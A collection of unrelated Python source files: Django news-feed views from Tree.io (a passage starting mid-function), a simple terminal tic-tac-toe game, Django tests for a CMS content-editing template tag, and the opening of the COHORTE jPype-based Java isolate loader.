updates = UpdateRecord.objects.filter(query).distinct()
if request.POST:
record = UpdateRecord()
record.record_type = 'share'
form = UpdateRecordForm(request.POST, user=profile, instance=record)
if form.is_valid():
record = form.save()
record.body = record.body.replace('\n', ' <br />')
record.save()
record.set_user_from_request(request)
return HttpResponseRedirect(reverse('news_social'))
else:
form = UpdateRecordForm(user=profile)
context = _get_default_context(request)
context.update({'form': form,
'updates': updates,
'profile': profile})
return render_to_response('news/social', context,
context_instance=RequestContext(request), response_format=response_format)
@handle_response_format
@treeio_login_required
def top_news(request, response_format='html'):
"Default index page - top news"
profile = request.user.profile
query = _get_filter_query(profile, filters=request.GET) & Q(score__gt=0)
updates = UpdateRecord.objects.filter(query).distinct()
if request.POST:
record = UpdateRecord()
record.record_type = 'share'
form = UpdateRecordForm(request.POST, user=profile, instance=record)
if form.is_valid():
record = form.save()
record.body = record.body.replace('\n', ' <br />')
record.save()
record.set_user_from_request(request)
return HttpResponseRedirect(reverse('news_index'))
else:
form = UpdateRecordForm(user=profile)
if response_format == 'rss':
return ObjectFeed(title=_('Top News'),
link=request.path,
description=_('Updates on activity in your Tree.io'),
objects=updates)(request)
context = _get_default_context(request)
context.update({'form': form,
'updates': updates,
'profile': profile})
return render_to_response('news/top_news', context,
context_instance=RequestContext(request), response_format=response_format)
@handle_response_format
@treeio_login_required
def my_watchlist(request, response_format='html'):
"Displays news about all objects a User is subscribed to"
profile = request.user.profile
query = _get_filter_query(profile, do_recipients=False, filters=request.GET) & Q(
about__in=profile.subscriptions.all()) & ~Q(author=profile)
updates = UpdateRecord.objects.filter(query).distinct()
if request.POST:
record = UpdateRecord()
record.record_type = 'share'
form = UpdateRecordForm(request.POST, user=profile, instance=record)
if form.is_valid():
record = form.save(commit=False)
record.body = record.body.replace('\n', ' <br />')
record.save()
record.set_user_from_request(request)
return HttpResponseRedirect(reverse('news_index'))
else:
form = UpdateRecordForm(user=profile)
if response_format == 'rss':
return ObjectFeed(title=_('My Watchlist'),
link=request.path,
description=_(
'Updates on your watchlist in Tree.io'),
objects=updates)(request)
context = _get_default_context(request)
context.update({'form': form,
'updates': updates,
'profile': profile})
return render_to_response('news/my_watchlist', context,
context_instance=RequestContext(request), response_format=response_format)
@handle_response_format
@treeio_login_required
def my_activity(request, response_format='html'):
"Default index page"
profile = request.user.profile
updates = UpdateRecord.objects.filter(author=profile).distinct()
if request.POST:
record = UpdateRecord()
record.record_type = 'share'
form = UpdateRecordForm(request.POST, user=profile, instance=record)
if form.is_valid():
record = form.save(commit=False)
record.body = record.body.replace('\n', ' <br />')
record.save()
record.set_user_from_request(request)
return HttpResponseRedirect(reverse('news_my_activity'))
else:
form = UpdateRecordForm(user=profile)
if response_format == 'rss':
return ObjectFeed(title=_('My Activity'),
link=request.path,
description=_('Updates on activity in your Tree.io'),
objects=updates)(request)
context = _get_default_context(request)
context.update({'form': form,
'updates': updates,
'profile': profile})
return render_to_response('news/my_activity', context,
context_instance=RequestContext(request), response_format=response_format)
@handle_response_format
@treeio_login_required
def index_by_module(request, module_name, response_format='html'):
"Default index page"
profile = request.user.profile
try:
module = profile.get_perspective().get_modules().filter(
name__icontains=module_name)[0]
except:
raise Http404('No such module in your Perspective')
query = _get_filter_query(profile, filters=request.GET) & Q(
about__object_type__icontains=module_name) & (~Q(author=profile) | Q(score__gt=0))
updates = UpdateRecord.objects.filter(query).distinct()
if request.POST:
record = UpdateRecord()
record.record_type = 'share'
form = UpdateRecordForm(request.POST, user=profile, instance=record)
if form.is_valid():
record = form.save()
record.body = record.body.replace('\n', ' <br />')
record.save()
record.set_user_from_request(request)
return HttpResponseRedirect(reverse('news_index_by_module', filters=[module_name]))
else:
form = UpdateRecordForm(user=profile)
if response_format == 'rss':
return ObjectFeed(title=(_(module.title) + ' ' + _('Activity')),
link=request.path,
description=_('Updates on activity in your Tree.io'),
objects=updates)(request)
context = _get_default_context(request)
context.update({'form': form,
'active_module': module,
'updates': updates,
'profile': profile,
'module_name': module_name})
return render_to_response('news/index_by_module', context,
context_instance=RequestContext(request), response_format=response_format)
#
# Widgets
#
@handle_response_format
@treeio_login_required
def widget_news_index(request, response_format='html'):
"Widget: All Activity"
profile = request.user.profile
query = _get_filter_query(profile) & (
~Q(author=profile) | Q(record_type='share') | Q(score__gt=0))
updates = UpdateRecord.objects.filter(query).distinct()
# don't do updates if social widget is used
if Widget.objects.filter(user=profile, widget_name='widget_news_social').exists():
form = None
else:
if request.POST:
record = UpdateRecord()
record.record_type = 'share'
form = UpdateRecordForm(
request.POST, user=profile, instance=record)
if form.is_valid():
record = form.save()
record.body = record.body.replace('\n', ' <br />')
record.save()
record.set_user_from_request(request)
return HttpResponseRedirect(reverse('core_dashboard_index'))
else:
form = UpdateRecordForm(user=profile)
context = _get_default_context(request)
context.update({'form': form,
'updates': updates,
'profile': profile})
return render_to_response('news/widgets/index', context,
context_instance=RequestContext(request), response_format=response_format)
@handle_response_format
@treeio_login_required
def widget_news_social(request, response_format='html'):
"Widget: Social Activity"
profile = request.user.profile
query = _get_filter_query(profile) & Q(record_type='share')
updates = UpdateRecord.objects.filter(query).distinct()
if request.POST:
record = UpdateRecord()
record.record_type = 'share'
form = UpdateRecordForm(request.POST, user=profile, instance=record)
if form.is_valid():
record = form.save()
record.body = record.body.replace('\n', ' <br />')
record.save()
record.set_user_from_request(request)
return HttpResponseRedirect(reverse('core_dashboard_index'))
else:
form = UpdateRecordForm(user=profile)
context = _get_default_context(request)
context.update({'form': form,
'updates': updates,
'profile': profile})
return render_to_response('news/widgets/social', context,
context_instance=RequestContext(request), response_format=response_format)
@handle_response_format
@treeio_login_required
def widget_my_watchlist(request, response_format='html'):
"Displays news about all objects a User is subscribed to"
profile = request.user.profile
query = _get_filter_query(profile, do_recipients=False) & Q(
about__in=profile.subscriptions.all()) & ~Q(author=profile)
updates = UpdateRecord.objects.filter(query).distinct()
context = _get_default_context(request)
context.update({'updates': updates,
'profile': profile})
return render_to_response('news/widgets/my_watchlist', context,
context_instance=RequestContext(request), response_format=response_format)
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
import os, sys
import platform
#clears the terminal
def terminal_clear():
if (platform.system() == "Linux"): os.system('clear')
elif (platform.system() == "Windows"):os.system('cls')
else: print("You're probably screwed")
""" A class that has methods to display the board,
whos turn, and the palyers name and score.
"""
class Display(object):
#~ def __init__(self): #setup names and pieces from input from the user
#~ pass
#update the board
def update(self, board_str, players_str):
terminal_clear()
#print player info
print(players_str)
#print board
print('\n' + board_str)
#get input from the user as to where to place a piece
def get_move(self):
return [input('row:'), input('col:')]
""" A class
"""
class Players(object):
def __init__(self, roster = { 0: { 'name': 'PLAYER 1', 'score': 0, 'piece': 'O', 'turn': True},
1: { 'name': 'PLAYER 2', 'score': 0, 'piece': 'X', 'turn': False} }):
self.roster = roster
#gets a stat from the roster about a player
def get_stat(self, player_num, stat_name):
return self.roster.get(player_num).get(stat_name)
#increases a player's score my one
def increment_score(self, player_num):
self.roster[player_num]['score'] = self.roster[player_num]['score'] + 1
#gets the amount of players
def num_of_players(self):
return len(self.roster)
#gives the turn to the next player
def change_turn(self):
for i in self.roster.keys():
if (self.roster[i]['turn']):
self.roster[i]['turn'] = False
if(i == len(self.roster) - 1):
self.roster[0]['turn'] = True
else:
self.roster[i + 1]['turn'] = True
return
#get a string representation of the roster in a ready-to-print- format
def get_roster_str(self):
roster_str = ''
for stats in self.roster.values():
roster_str = roster_str + '%s(%s):%s%s\n' % tuple([stats.get('name'), stats.get('piece'), stats.get('score'), stats.get('turn')])
roster_str = roster_str.replace('True', ' <----').replace('False', '')
return roster_str
""" A class
"""
class Board(object):
def __init__(self, board = [ [ ' ', ' ', ' '] , [ ' ', ' ', ' '] , [ ' ', ' ', ' '] ]):
self.board = board
#False if no winner, player's num if winner
def is_winner(self):
''' Better way:
Collect pieces and put in dictionary with coords
Sort with the x coord then look for 3 in a row
Sort with the y coord then look for 3 in a row
'''
for i in range(3):
r = self.board[i]
if (r[0] != ' ' and r[0] == r[1] and r[1] == r[2]): return True
c = []
for j in range(3): c.append(self.board[j][i])
print('-- c:%s' % c)
if (c[0] != ' ' and c[0] == c[1] and c[1] == c[2]): return True #String index out of range!
diag1 = []
diag2 = []
for i in range(3):
diag1.append(self.board[i][i])
diag2.append(self.board[i][abs(i-2)])
if (diag2[0] != ' ' and diag1[0] == diag1[1] and diag1[1] == diag1[2]): return True
if (diag2[0] != ' ' and diag2[0] == diag2[1] and diag2[1] == diag2[2]): return True
#return false if nothing found
return False
#return a string resprentation of the board ready to be printed
def get_board_str(self):
board_str = ' 1 2 3 \n'
i = 1
for column in self.board:
board_str += '[%s-%s-%s]%s\n' % tuple(column + [i])
i += 1
return board_str
#true if the place is empty, otherwise false
def place_empty(self, place):
return self.board[place[0]][place[1]] == ' '
#place a piece on the board
def place(self, piece, place):
if (self.board[place[0]][place[1]] == ' '):
self.board[place[0]][place[1]] = piece
""" A class
"""
class Game(object):
def __init__(self):
self.board = Board()
self.players = Players()
self.display = Display()
#contains the loop
def start(self):
done = False
total_turns = 0
self.dis_update()
while (not done):
move_place = self.get_valid_input()
turn = self.get_turn()
self.board.place(self.players.get_stat(turn, 'piece'), move_place)
total_turns += 1
self.players.change_turn()
if (total_turns > 4):
print('Total turns:%s' % total_turns)
if (self.board.is_winner()):
done = True
print('Winner')
if (total_turns >= 9):
done = True
print('No winner')
self.dis_update()
print('END OF START METHOD')
#essentially a wrapper for Display.get_move() and subtracts 1
def get_valid_input(self):
#loop until valid input
move_coords = []
valid_input = False
while (not valid_input):
move_coords = self.display.get_move()
try:
if (int(move_coords[0]) in range(1, 4) and int(move_coords[1]) in range(1, 4)):
move_coords[0] = int(move_coords[0]) - 1
move_coords[1] = int(move_coords[1]) - 1
if (self.board.place_empty(move_coords)):
valid_input = True
else: raise ValueError
else: raise ValueError
except ValueError:
terminal_clear()
self.dis_update()
return move_coords
#finds whos turn it is, sort of a wrapper
def get_turn(self):
for i in range(self.players.num_of_players()):
if (self.players.get_stat(i, 'turn')): return i
#starts a new game and updates the players' scores
def new_game(self):
pass
#wrapper
def dis_update(self):
self.display.update(self.board.get_board_str(), self.players.get_roster_str())
""" The Main method
"""
def main():
print("start")
game = Game()
game.start()
print("quit")
quit()
return 0
#call the "main" function if running this script
if __name__ == '__main__': main()
| |
from django.test import TestCase
from django.template import Template, Context
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User, Permission
from django.contrib.contenttypes.models import ContentType
from content_edit.models import CmsContent
class SimpleTest(TestCase):
def setUp(self):
user = User.objects.create_user('temporary', 'temporary@gmail.com', 'temporary')
user.is_staff = True
user.save()
self.client.login(username='temporary', password='temporary')
def test_edit_content(self):
""" Test viewing a new content area and chaning it.
"""
self.assertEqual(CmsContent.objects.count(), 0)
response = self.client.get(reverse('sample_content_edit'))
self.assertEqual(CmsContent.objects.count(), 1)
def test_save_content(self):
""" Test saving content """
test_content = '<p>Hello</p>'
response = self.client.get(reverse('sample_content_edit'))
response = self.client.post(
reverse('ajax_save_content'), {
'content_name': 'fun_content',
'content': test_content,
},)
cms_content = CmsContent.objects.get(site=1, name="fun_content")
self.assertEqual(cms_content.content, test_content)
response = self.client.get(reverse('sample_content_edit'))
self.assertContains(response, test_content)
class TemplateTagDefaultSettingsTests(TestCase):
def setUp(self):
self.content1 = CmsContent(name='name1', content='content1',site_id=1)
self.content1.save()
self.admin_user = User.objects.create_user('admin', 'admin@gmail.com', 'temporary')
self.admin_user.is_staff = True
self.admin_user.save()
self.user_wo_perm = User.objects.create_user('user_wo_perm', 'admin@gmail.com', 'temporary')
self.user_wo_perm.save()
content_type = ContentType.objects.get_for_model(CmsContent)
self.user_w_add_perm = User.objects.create_user('user_w_add_perm', 'admin@gmail.com', 'temporary')
self.user_w_add_perm.save()
add_perm = Permission.objects.create(codename='content_edit_add_cmscontent',
name='add',
content_type=content_type)
self.user_w_add_perm.user_permissions.add(add_perm)
self.user_w_change_perm = User.objects.create_user('user_w_change_perm', 'admin@gmail.com', 'temporary')
self.user_w_change_perm.save()
change_perm = Permission.objects.create(codename='content_edit_change_cmscontent',
name='change',
content_type=content_type)
self.user_w_change_perm.user_permissions.add(change_perm)
def test_existing_content_without_user(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name1' %}"
).render(Context())
self.assertEqual(1, CmsContent.objects.count())
self.assertEqual(out,'content1')
def test_existing_content_for_user_without_perms(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name1' %}"
).render(Context({'user':self.user_wo_perm}))
self.assertEqual(1, CmsContent.objects.count())
self.assertEqual(out,'content1')
def test_existing_content_for_user_with_add_perm(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name1' %}"
).render(Context({'user':self.user_w_add_perm}))
self.assertEqual(1, CmsContent.objects.count())
self.assertEqual(out,'content1')
def test_existing_content_for_user_with_change_perm(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name1' %}"
).render(Context({'user':self.user_w_change_perm}))
self.assertEqual(1, CmsContent.objects.count())
self.assertEqual(out,'content1')
def test_existing_content_for_admin_user(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name1' %}"
).render(Context({'user':self.admin_user}))
self.assertEqual(1, CmsContent.objects.count())
self.assertEqual(out,'<div id="content_name1" onblur="save_cms_content(this, \'name1\')" contenteditable="true">content1</div>')
def test_non_existing_content_without_user(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name2' %}"
).render(Context())
self.assertEqual(2, CmsContent.objects.count())
self.assertEqual(out,'')
CmsContent.objects.exclude(name='name1').delete()
def test_non_existing_content_for_user_without_perms(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name2' %}"
).render(Context({'user':self.user_wo_perm}))
self.assertEqual(2, CmsContent.objects.count())
self.assertEqual(out,'')
CmsContent.objects.exclude(name='name1').delete()
def test_non_existing_content_for_user_with_add_perm(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name2' %}"
).render(Context({'user':self.user_w_add_perm}))
self.assertEqual(2, CmsContent.objects.count())
self.assertEqual(out,'')
CmsContent.objects.exclude(name='name1').delete()
def test_non_existing_content_for_user_with_change_perm(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name2' %}"
).render(Context({'user':self.user_w_change_perm}))
self.assertEqual(2, CmsContent.objects.count())
self.assertEqual(out,'')
CmsContent.objects.exclude(name='name1').delete()
def test_non_existing_content_for_admin_user(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name2' %}"
).render(Context({'user':self.admin_user}))
self.assertEqual(2, CmsContent.objects.count())
self.assertEqual(out,'<div id="content_name2" onblur="save_cms_content(this, \'name2\')" contenteditable="true"></div>')
CmsContent.objects.exclude(name='name1').delete()
class TemplateTagNoAUTOCREATETests(TestCase):
def setUp(self):
from content_edit.templatetags import content_edit_tags
setattr(content_edit_tags,'AUTOCREATE',False)
self.content1 = CmsContent(name='name1', content='content1',site_id=1)
self.content1.save()
self.admin_user = User.objects.create_user('admin', 'admin@gmail.com', 'temporary')
self.admin_user.is_staff = True
self.admin_user.save()
self.user_wo_perm = User.objects.create_user('user_wo_perm', 'admin@gmail.com', 'temporary')
self.user_wo_perm.save()
content_type = ContentType.objects.get_for_model(CmsContent)
self.user_w_add_perm = User.objects.create_user('user_w_add_perm', 'admin@gmail.com', 'temporary')
self.user_w_add_perm.save()
add_perm = Permission.objects.create(codename='content_edit_add_cmscontent',
name='add',
content_type=content_type)
self.user_w_add_perm.user_permissions.add(add_perm)
self.user_w_change_perm = User.objects.create_user('user_w_change_perm', 'admin@gmail.com', 'temporary')
self.user_w_change_perm.save()
change_perm = Permission.objects.create(codename='content_edit_change_cmscontent',
name='change',
content_type=content_type)
self.user_w_change_perm.user_permissions.add(change_perm)
def test_existing_content_without_user(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name1' %}"
).render(Context())
self.assertEqual(1, CmsContent.objects.count())
self.assertEqual(out,'content1')
def test_existing_content_for_user_without_perms(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name1' %}"
).render(Context({'user':self.user_wo_perm}))
self.assertEqual(1, CmsContent.objects.count())
self.assertEqual(out,'content1')
def test_existing_content_for_user_with_add_perm(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name1' %}"
).render(Context({'user':self.user_w_add_perm}))
self.assertEqual(1, CmsContent.objects.count())
self.assertEqual(out,'content1')
def test_existing_content_for_user_with_change_perm(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name1' %}"
).render(Context({'user':self.user_w_change_perm}))
self.assertEqual(1, CmsContent.objects.count())
self.assertEqual(out,'content1')
def test_existing_content_for_admin_user(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name1' %}"
).render(Context({'user':self.admin_user}))
self.assertEqual(1, CmsContent.objects.count())
self.assertEqual(out,'<div id="content_name1" onblur="save_cms_content(this, \'name1\')" contenteditable="true">content1</div>')
def test_non_existing_content_without_user(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name2' %}"
).render(Context())
self.assertEqual(1, CmsContent.objects.count())
self.assertEqual(out,'')
CmsContent.objects.exclude(name='name1').delete()
def test_non_existing_content_for_user_without_perms(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name2' %}"
).render(Context({'user':self.user_wo_perm}))
self.assertEqual(1, CmsContent.objects.count())
self.assertEqual(out,'')
CmsContent.objects.exclude(name='name1').delete()
def test_non_existing_content_for_user_with_add_perm(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name2' %}"
).render(Context({'user':self.user_w_add_perm}))
self.assertEqual(1, CmsContent.objects.count())
self.assertEqual(out,'')
CmsContent.objects.exclude(name='name1').delete()
def test_non_existing_content_for_user_with_change_perm(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name2' %}"
).render(Context({'user':self.user_w_change_perm}))
self.assertEqual(1, CmsContent.objects.count())
self.assertEqual(out,'')
CmsContent.objects.exclude(name='name1').delete()
def test_non_existing_content_for_admin_user(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name2' %}"
).render(Context({'user':self.admin_user}))
self.assertEqual(2, CmsContent.objects.count())
self.assertEqual(out,'<div id="content_name2" onblur="save_cms_content(this, \'name2\')" contenteditable="true"></div>')
CmsContent.objects.exclude(name='name1').delete()
def tearDown(self):
from content_edit.templatetags import content_edit_tags
setattr(content_edit_tags,'AUTOCREATE',True)
class TemplateTagCHECK_PERMSTests(TestCase):
def setUp(self):
from content_edit.templatetags import content_edit_tags
setattr(content_edit_tags,'CHECK_PERMS',False)
self.content1 = CmsContent(name='name1', content='content1',site_id=1)
self.content1.save()
self.admin_user = User.objects.create_user('admin', 'admin@gmail.com', 'temporary')
self.admin_user.is_staff = True
self.admin_user.save()
self.user_wo_perm = User.objects.create_user('user_wo_perm', 'admin@gmail.com', 'temporary')
self.user_wo_perm.save()
content_type = ContentType.objects.get_for_model(CmsContent)
self.user_w_add_perm = User.objects.create_user('user_w_add_perm', 'admin@gmail.com', 'temporary')
self.user_w_add_perm.save()
add_perm = Permission.objects.create(codename='content_edit_add_cmscontent',
name='add',
content_type=content_type)
self.user_w_add_perm.user_permissions.add(add_perm)
self.user_w_change_perm = User.objects.create_user('user_w_change_perm', 'admin@gmail.com', 'temporary')
self.user_w_change_perm.save()
change_perm = Permission.objects.create(codename='content_edit_change_cmscontent',
name='change',
content_type=content_type)
self.user_w_change_perm.user_permissions.add(change_perm)
def test_existing_content_without_user(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name1' %}"
).render(Context())
self.assertEqual(1, CmsContent.objects.count())
self.assertEqual(out,'content1')
def test_existing_content_for_user_without_perms(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name1' %}"
).render(Context({'user':self.user_wo_perm}))
self.assertEqual(1, CmsContent.objects.count())
self.assertEqual(out,'content1')
def test_existing_content_for_user_with_add_perm(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name1' %}"
).render(Context({'user':self.user_w_add_perm}))
self.assertEqual(1, CmsContent.objects.count())
self.assertEqual(out,'content1')
def test_existing_content_for_user_with_change_perm(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name1' %}"
).render(Context({'user':self.user_w_change_perm}))
self.assertEqual(1, CmsContent.objects.count())
self.assertEqual(out,'content1')
def test_existing_content_for_admin_user(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name1' %}"
).render(Context({'user':self.admin_user}))
self.assertEqual(1, CmsContent.objects.count())
self.assertEqual(out,'<div id="content_name1" onblur="save_cms_content(this, \'name1\')" contenteditable="true">content1</div>')
def test_non_existing_content_without_user(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name2' %}"
).render(Context())
self.assertEqual(2, CmsContent.objects.count())
self.assertEqual(out,'')
CmsContent.objects.exclude(name='name1').delete()
def test_non_existing_content_for_user_without_perms(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name2' %}"
).render(Context({'user':self.user_wo_perm}))
self.assertEqual(2, CmsContent.objects.count())
self.assertEqual(out,'')
CmsContent.objects.exclude(name='name1').delete()
def test_non_existing_content_for_user_with_add_perm(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name2' %}"
).render(Context({'user':self.user_w_add_perm}))
self.assertEqual(2, CmsContent.objects.count())
self.assertEqual(out,'')
CmsContent.objects.exclude(name='name1').delete()
def test_non_existing_content_for_user_with_change_perm(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name2' %}"
).render(Context({'user':self.user_w_change_perm}))
self.assertEqual(2, CmsContent.objects.count())
self.assertEqual(out,'')
CmsContent.objects.exclude(name='name1').delete()
def test_non_existing_content_for_admin_user(self):
out = Template(
"{% load content_edit_tags %}"
"{% cms_content 'name2' %}"
).render(Context({'user':self.admin_user}))
self.assertEqual(2, CmsContent.objects.count())
self.assertEqual(out,'<div id="content_name2" onblur="save_cms_content(this, \'name2\')" contenteditable="true"></div>')
CmsContent.objects.exclude(name='name1').delete()
def tearDown(self):
from content_edit.templatetags import content_edit_tags
setattr(content_edit_tags,'CHECK_PERMS',True)
| |
#!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
COHORTE Java isolate loader, based on jPype
**TODO:**
* Review constants names & values
:author: Thomas Calmant
:license: Apache Software License 2.0
..
Copyright 2014 isandlaTech
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Modifications:
MOD_BD_20150916 Inherits PROP_NODE_DATA_DIR from pelix.
"""
# Python standard library
import logging
import os
import sys
import time
import threading
# iPOPO Decorators
from pelix.ipopo.decorators import ComponentFactory, Provides, Validate, \
Invalidate, Property, Requires
import pelix.framework
import pelix.shell
# COHORTE constants
import cohorte
import cohorte.repositories
# Herald
import herald
# JPype (Java bridge)
import jpype
# ------------------------------------------------------------------------------
# Documentation strings format
__docformat__ = "restructuredtext en"
# Version
__version_info__ = (1, 1, 0)
__version__ = ".".join(str(x) for x in __version_info__)
# ------------------------------------------------------------------------------
ISOLATE_LOADER_FACTORY = 'cohorte-loader-java-factory'
""" Forker loader factory name """
LOADER_KIND = 'osgi'
""" Kind of isolate started with this loader """
BUNDLE_SERVICES_FOLDER = 'META-INF/services'
""" Path of the descriptions of the bundle services (in a JAR) """
FRAMEWORK_SERVICE = 'org.osgi.framework.launch.FrameworkFactory'
""" FrameworkFactory service descriptor in the framework JAR file """
FRAMEWORK_SYSTEMPACKAGES_EXTRA = "org.osgi.framework.system.packages.extra"
""" OSGi extra system packages """
PYTHON_BRIDGE_BUNDLE_API = "org.cohorte.pyboot.api"
""" Name of the Python bridge API bundle """
PYTHON_BRIDGE_BUNDLE = "org.cohorte.pyboot"
""" Name of the Python bridge bundle """
PYTHON_JAVA_BRIDGE_INTERFACE = "org.cohorte.pyboot.api.IPyBridge"
""" Interface of the Python - Java bridge """
HERALD_EVENT_BUNDLE_API = "org.cohorte.herald.eventapi"
""" Name of the bundle and package which contain the Herald Event API """
HERALD_EVENT_INTERFACE = "org.cohorte.herald.eventapi.IEvent"
""" Interface of an Herald Event """
HERALD_EVENT_FACTORY_INTERFACE = "org.cohorte.herald.eventapi.IEventFactory"
""" Interface of the Herald EventFactory service """
_logger = logging.getLogger(__name__)
# ------------------------------------------------------------------------------
class PyBridge(object):
"""
Python - Java bridge service implementation
"""
# pylint: disable=invalid-name
# Implemented Java interface
JAVA_INTERFACE = PYTHON_JAVA_BRIDGE_INTERFACE
def __init__(self, context, jvm, java_configuration, configuration_parser,
callback):
"""
Sets up the bridge
:param context: The bundle context
:param jvm: The JVM wrapper
:param java_configuration: Java boot configuration
:param callback: Method to call back on error or success
"""
# Bundle context
self._context = context
# Java class
self.ArrayList = jvm.load_class("java.util.ArrayList")
self.Component = jvm.load_class("org.cohorte.pyboot.api.ComponentBean")
self.HashMap = jvm.load_class("java.util.HashMap")
# Prepare members
self._callback = callback
self._components = {}
self._parser = configuration_parser
# Convert stored components
self._java_boot_config = self._to_java(java_configuration)
self._prepare_components(java_configuration.composition)
def _prepare_components(self, raw_components):
"""
Converts the Python Component objects into Java Component beans
:param raw_components: Python components representations
"""
for component in raw_components:
# Convert properties
properties = self.HashMap()
for key, value in component.properties.items():
properties.put(key, value)
# Store the component bean
self._components[component.name] = \
self.Component(component.factory, component.name, properties)
def _to_java(self, data):
"""
Recursively converts lists and maps to Java ones
:param data: Data to be converted
:return: Converted data
"""
try:
# Named tuple (in theory)
as_dict = getattr(data, '_asdict')
except AttributeError:
# Keep data as is
pass
else:
data = as_dict()
if isinstance(data, dict):
# Convert a dictionary
converted = self.HashMap()
for key, value in data.items():
# Convert entry
converted.put(self._to_java(key), self._to_java(value))
return converted
elif isinstance(data, (list, tuple, set)):
# Convert a list
converted = self.ArrayList()
for item in data:
# Convert each item
converted.add(self._to_java(item))
return converted
else:
# No conversion
return data
@staticmethod
def debug(message, values):
"""
Logs a debug message
"""
_logger.debug(message.format(*values))
@staticmethod
def error(message, values):
"""
Logs an error message
"""
_logger.error(message.format(*values))
def getComponents(self):
"""
Retrieves the components to instantiate (Java API)
:return: An array of components
"""
# Create a list
result = self.ArrayList()
for component in self._components.values():
result.add(component)
return result
def getStartConfiguration(self):
"""
Retrieves the configuration used to start this isolate as a map
:return: The configuration used to start this isolate
"""
return self._java_boot_config
@staticmethod
def getPid():
"""
Retrieves the Process ID of this isolate
:return: The isolate PID
"""
return os.getpid()
def getRemoteShellPort(self):
"""
Returns the port used by the Pelix remote shell, or -1 if the shell is
not active
:return: The port used by the remote shell, or -1
"""
ref = self._context.get_service_reference(
pelix.shell.REMOTE_SHELL_SPEC)
if ref is None:
return -1
try:
# Get the service
shell = self._context.get_service(ref)
# Get the shell port
port = shell.get_access()[1]
# Release the service
self._context.unget_service(ref)
return port
except pelix.framework.BundleException:
# Service lost (called while the framework was stopping)
return -1
def onComponentStarted(self, name):
"""
Called when a component has been started
:param name: Name of the started component
"""
if name in self._components:
del self._components[name]
if not self._components:
self._callback(True, "All components have been instantiated")
def onError(self, error):
"""
Called when an error has occurred
:param error: An error message
"""
self._callback(False, error)
def prepareIsolate(self, uid, name, node, kind, level, sublevel,
bundles, composition):
"""
Prepares the configuration dictionary of an isolate
"""
try:
conf = self._parser.prepare_isolate(
uid, name, node, kind, level, sublevel, bundles, composition)
except:
_logger.exception("Error preparing isolate...")
return None
return self._to_java(conf)
def readConfiguration(self, filename):
"""
Reads the given configuration file
:param filename: A configuration file name
:return: The parsed configuration map
"""
# Load the file
raw_dict = self._parser.read(filename)
# Convert the dictionary to Java
return self._to_java(raw_dict)
# ------------------------------------------------------------------------------
class EventFactory(object):
"""
Implementation of org.cohorte.herald.eventapi.IEventFactory
"""
JAVA_INTERFACE = HERALD_EVENT_FACTORY_INTERFACE
def __init__(self, java_svc):
"""
Sets up members
"""
self._java = java_svc
def createEvent(self):
"""
Creates an event for the Java world
"""
return self._java.make_proxy(EventProxy())
def sleep(self, milliseconds):
"""
Sleeps the given number of milliseconds
"""
time.sleep(milliseconds / 1000.)
def toString(self):
"""
Java toString() method
"""
return "Python Event Factory for Herald"
class EventProxy(object):
"""
Implementation of org.cohorte.herald.eventapi.IEvent
"""
JAVA_INTERFACE = HERALD_EVENT_INTERFACE
def __init__(self):
"""
Sets up members
"""
self.__event = threading.Event()
# Common names
for method in ('clear', 'isSet', 'set'):
setattr(self, method, getattr(self.__event, method))
def waitEvent(self, timeout_ms=None):
"""
Proxy to call the wait() method of the event
"""
if timeout_ms is None or timeout_ms < 0:
return self.__event.wait()
else:
return self.__event.wait(timeout_ms / 1000.)
def toString(self):
"""
Java toString() method
"""
return "Python EventProxy for Herald"
# ------------------------------------------------------------------------------
@ComponentFactory(ISOLATE_LOADER_FACTORY)
@Provides(cohorte.SERVICE_ISOLATE_LOADER)
@Property('_handled_kind', cohorte.SVCPROP_ISOLATE_LOADER_KIND, LOADER_KIND)
@Requires('_java', cohorte.SERVICE_JAVA_RUNNER)
@Requires('_repository', cohorte.repositories.SERVICE_REPOSITORY_ARTIFACTS,
spec_filter="({0}=java)"
.format(cohorte.repositories.PROP_REPOSITORY_LANGUAGE))
@Requires('_config', cohorte.SERVICE_CONFIGURATION_READER)
@Requires('_finder', cohorte.SERVICE_FILE_FINDER)
class JavaOsgiLoader(object):
"""
Pelix isolate loader. Needs a configuration to be given as a parameter of
the load() method.
"""
